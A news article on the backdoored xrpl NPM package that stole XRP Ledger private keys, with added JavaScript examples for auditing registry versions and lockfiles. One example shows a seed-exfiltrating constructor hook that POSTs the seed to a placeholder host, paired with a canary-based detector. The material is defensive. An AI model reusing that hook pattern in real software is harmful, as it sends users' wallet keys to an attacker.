Backdoor Found in Official XRP Ledger NPM Package

XRP Ledger SDK hit by supply chain attack: malicious NPM versions stole private keys; users urged to update the xrpl package to 4.2.5 or 2.14.3 immediately.
A serious security breach targeting users of the XRP Ledger has been uncovered by the Aikido Intel threat detection system. Aikido's research shows it was a sophisticated supply chain attack that compromised the official xrpl Node Package Manager (NPM) package, a widely used software development kit (SDK) for interacting with the XRP Ledger.
The infiltration introduced a backdoor designed to steal users' private keys, giving attackers complete control over the affected wallets. Suspicion was raised on April 21st at 20:53 GMT+0 when five newly published versions of the xrpl package on NPM, which sees over 140,000 weekly downloads, were found to contain malicious code that did not match the official releases on GitHub.
The compromised versions were 4.2.1, 4.2.2, 4.2.3, 4.2.4 and 2.14.2, whereas the latest legitimate version on GitHub at the time of the attack was 4.2.0. This discrepancy is what raised concerns.
“The fact that these packages showed up without a matching release on GitHub is very suspicious,” Aikido’s malware researcher Charlie Eriksen revealed in the blog post shared exclusively with Hackread.com.
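The heuristic behind that observation, that a version present on the npm registry with no corresponding tag or release on GitHub deserves scrutiny, is easy to automate. The following is an added example and is not Aikido's tooling or the xrpl project's code. Its three inputs are constructed to mirror the versions named above; in practice the npm version list and dist-tags come from the registry metadata for the package and the tag list from the repository, and the "xrpl@x.y.z" tag format is an assumption about how the repository names its tags.

```javascript
// Added example, not Aikido's tooling or the xrpl project's code. Flags npm
// versions with no matching GitHub tag, and notes whether "latest" is one.
//
// Constructed inputs mirroring the versions named in the article. Real data
// would come from https://registry.npmjs.org/<package> ("versions" keys and
// "dist-tags") and from the repository's tag list; the "xrpl@x.y.z" tag
// format is an assumption.
const PKG = "xrpl";
const NPM_VERSIONS = ["2.14.1", "2.14.2", "4.1.0", "4.2.0", "4.2.1", "4.2.2", "4.2.3", "4.2.4"];
const DIST_TAGS = { latest: "4.2.4" };
const GITHUB_TAGS = ["xrpl@2.14.1", "xrpl@4.1.0", "xrpl@4.2.0"];

// Strip a "name@" or leading "v" prefix so tags compare directly to npm versions.
function normalizeTag(tag, pkgName) {
  let v = tag.trim();
  if (v.startsWith(`${pkgName}@`)) v = v.slice(pkgName.length + 1);
  if (/^v\d/.test(v)) v = v.slice(1);
  return v;
}

// Numeric major.minor.patch ordering; any pre-release suffix is ignored.
function compareSemver(a, b) {
  const pa = a.split("-")[0].split(".").map(Number);
  const pb = b.split("-")[0].split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Versions published to npm that have no matching tag on GitHub, ascending.
function findUnreleasedVersions(npmVersions, githubTags, pkgName) {
  const tagged = new Set(githubTags.map((t) => normalizeTag(t, pkgName)));
  return npmVersions.filter((v) => !tagged.has(v)).sort(compareSemver);
}

// Report: orphaned versions, whether the "latest" dist-tag points at one of
// them (the worst case, since `npm install` picks it up), and the highest
// version the repository actually knows about.
function auditRegistryAgainstGithub(npmVersions, distTags, githubTags, pkgName) {
  const unreleased = findUnreleasedVersions(npmVersions, githubTags, pkgName);
  const tagged = githubTags.map((t) => normalizeTag(t, pkgName)).sort(compareSemver);
  return {
    unreleased,
    latestIsUnreleased: unreleased.includes(distTags.latest),
    highestTagged: tagged.length ? tagged[tagged.length - 1] : null,
  };
}

const report = auditRegistryAgainstGithub(NPM_VERSIONS, DIST_TAGS, GITHUB_TAGS, PKG);
console.log(JSON.stringify(report, null, 2));
```

Run against the constructed data, the report lists 2.14.2 and 4.2.1 through 4.2.4 as orphaned and flags that `latest` points at one of them. A tag that merely exists is a weak signal on its own; the stronger check is that the tag's tarball matches what the registry serves, which this example does not attempt.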
Further probing revealed unusual code in the src/index.ts file of version 4.2.4 (the rogue release tagged as latest on NPM): a harmless-looking function named checkValidityOfSeed that in fact made an HTTP POST request to an unfamiliar domain, 0x9c[.]xyz. Analysis of the domain's registration data showed it had only recently been created, adding to concerns about its legitimacy.
Digging deeper, researchers found that checkValidityOfSeed was called from critical code paths, including the constructor of the Wallet class in src/Wallet/index.ts. As a result the malicious code ran whenever a Wallet object was instantiated in an application using a compromised xrpl package, attempting to send the user's seed or private key (which controls access to the user's XRP funds) to the attacker's server.
In the researchers' words, the backdoor could steal private keys "as soon as a Wallet object is instantiated."
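The pattern described above, a benign-sounding "validity check" wired into the Wallet constructor, is worth seeing in code together with a check that catches it. The block below is an added example, not code from the xrpl package or from Aikido's write-up. The host exfil.example.invalid is a placeholder rather than the attacker's domain, the seed is a constructed canary string rather than a real XRPL seed, and every network call goes through an injected fetchImpl so nothing leaves the machine.

```javascript
// Added example, not code from the xrpl package or Aikido's write-up. Models
// the constructor-hook exfiltration pattern and a canary-seed tripwire.

// --- the backdoor pattern -------------------------------------------------

function checkValidityOfSeed(seed, fetchImpl) {
  // The name suggests input validation; the body ships the seed off-box.
  // Fire-and-forget with errors swallowed, so the caller never notices.
  // Placeholder host, not the attacker's real domain.
  fetchImpl("https://exfil.example.invalid/collect", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ seed }),
  }).catch(() => {});
  return true;
}

class BackdooredWallet {
  constructor(seed, fetchImpl = globalThis.fetch) {
    checkValidityOfSeed(seed, fetchImpl); // fires on every instantiation
    this.seed = seed;
  }
}

// A wallet that validates locally and never touches the network.
class CleanWallet {
  constructor(seed, _fetchImpl) {
    if (typeof seed !== "string" || seed.length === 0) {
      throw new Error("invalid seed");
    }
    this.seed = seed;
  }
}

// --- the tripwire ---------------------------------------------------------

// A fetch stand-in that records every outbound request instead of sending it.
function makeEgressRecorder() {
  const calls = [];
  const fetchImpl = (url, init = {}) => {
    calls.push({
      host: new URL(String(url)).host,
      method: init.method || "GET",
      body: init.body == null ? "" : String(init.body),
    });
    return Promise.resolve({ ok: true, status: 200 });
  };
  return { calls, fetchImpl };
}

// Instantiate the wallet class under test with a canary seed and report any
// request that carries the canary or targets a host outside the allowlist.
// Key derivation is pure computation: it should produce no requests at all.
function detectSeedExfiltration(WalletClass, canarySeed, allowedHosts) {
  const { calls, fetchImpl } = makeEgressRecorder();
  new WalletClass(canarySeed, fetchImpl);
  return calls
    .filter((c) => c.body.includes(canarySeed) || !allowedHosts.has(c.host))
    .map((c) => ({ host: c.host, method: c.method, leakedCanary: c.body.includes(canarySeed) }));
}

// Constructed canary: not a real XRPL seed, just a string we can search for.
const CANARY_SEED = "sCANARYseedNotRealDoNotUse0000";
// Illustrative allowlist of hosts a wallet library might legitimately reach.
const ALLOWED_HOSTS = new Set(["s1.ripple.com", "xrplcluster.com"]);

console.log("backdoored:", detectSeedExfiltration(BackdooredWallet, CANARY_SEED, ALLOWED_HOSTS));
console.log("clean:", detectSeedExfiltration(CleanWallet, CANARY_SEED, ALLOWED_HOSTS));
```

The canary match only catches a seed sent in the clear; a hook that encrypts or encodes the seed first would still trip the host allowlist, which is the more durable signal. In a real pipeline the equivalent is running the dependency's test suite or a smoke test under an egress policy that denies everything except the known RPC endpoints.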
Researchers also noted that the attackers' methods evolved. The first malicious versions (4.2.1 and 4.2.2) injected the code into the built JavaScript files and stripped the scripts and Prettier configuration (the settings that govern how the Prettier code formatter formats the code) from package.json. Versions 4.2.3 and 4.2.4 instead integrated the malicious code directly into the TypeScript source, a refinement intended to make the tampering harder to detect.
Following the disclosure of the attack, the official xrpl team released two clean versions of the package, 4.2.5 and 2.14.3. Users are strongly encouraged to update to these versions immediately to mitigate any remaining risk.
Researchers also stressed that "any seed or private key that was processed by the code has been compromised" and should be considered unusable. Updating the package alone is not enough: any assets held by those keys should be moved immediately to a new wallet with a freshly generated private key.
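A practitioner's first question is whether a given project ever installed one of the five compromised versions, including transitively, and therefore whether the key-rotation advice above applies. The following is an added example, not part of the article or the xrpl project: it audits a package-lock.json for those versions, maps each to the clean release to move to, and reports whether rotation is required. SAMPLE_LOCK is a constructed lockfile with one direct xrpl dependency and one nested copy pulled in by a made-up library.

```javascript
// Added example, not from the article or the xrpl project. Audits a
// package-lock.json for the five compromised xrpl versions named above.

// Compromised version -> clean release to upgrade to (from the article).
const COMPROMISED_TO_FIXED = {
  "4.2.1": "4.2.5",
  "4.2.2": "4.2.5",
  "4.2.3": "4.2.5",
  "4.2.4": "4.2.5",
  "2.14.2": "2.14.3",
};

// Constructed lockfile (lockfileVersion 3 layout); "some-lib" is made up.
const SAMPLE_LOCK = {
  name: "my-app",
  lockfileVersion: 3,
  packages: {
    "": { dependencies: { xrpl: "^4.2.0", "some-lib": "^1.0.0" } },
    "node_modules/xrpl": { version: "4.2.4" },
    "node_modules/some-lib": { version: "1.0.0", dependencies: { xrpl: "^2.14.0" } },
    "node_modules/some-lib/node_modules/xrpl": { version: "2.14.2" },
    "node_modules/ripple-binary-codec": { version: "2.2.0" },
  },
};

// Collect every installed copy of pkgName. Handles the flat "packages" map of
// lockfileVersion 2/3 and the nested "dependencies" tree of lockfileVersion 1.
function findInstalled(lock, pkgName) {
  const found = [];
  if (lock.packages) {
    for (const [path, entry] of Object.entries(lock.packages)) {
      if (path === `node_modules/${pkgName}` || path.endsWith(`/node_modules/${pkgName}`)) {
        found.push({ path, version: entry.version });
      }
    }
    return found;
  }
  const walk = (deps, prefix) => {
    for (const [name, entry] of Object.entries(deps || {})) {
      const path = `${prefix}node_modules/${name}`;
      if (name === pkgName) found.push({ path, version: entry.version });
      walk(entry.dependencies, `${path}/`);
    }
  };
  walk(lock.dependencies, "");
  return found;
}

// One finding per installed copy, plus a single rotateKeys verdict: true if
// any copy is a compromised version, because every seed that passed through
// that code must be treated as exposed regardless of the upgrade.
function auditLockfile(lock, pkgName = "xrpl") {
  const findings = findInstalled(lock, pkgName).map((f) => ({
    ...f,
    compromised: Object.hasOwn(COMPROMISED_TO_FIXED, f.version),
    upgradeTo: Object.hasOwn(COMPROMISED_TO_FIXED, f.version) ? COMPROMISED_TO_FIXED[f.version] : null,
  }));
  return { findings, rotateKeys: findings.some((f) => f.compromised) };
}

console.log(JSON.stringify(auditLockfile(SAMPLE_LOCK), null, 2));
```

Note that a clean lockfile today does not prove a compromised version was never installed: the window between April 21st and the upgrade matters, so the check is best run against the lockfile as committed at each point in that period, and any seed handled while a flagged version was present should still be rotated.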
HackRead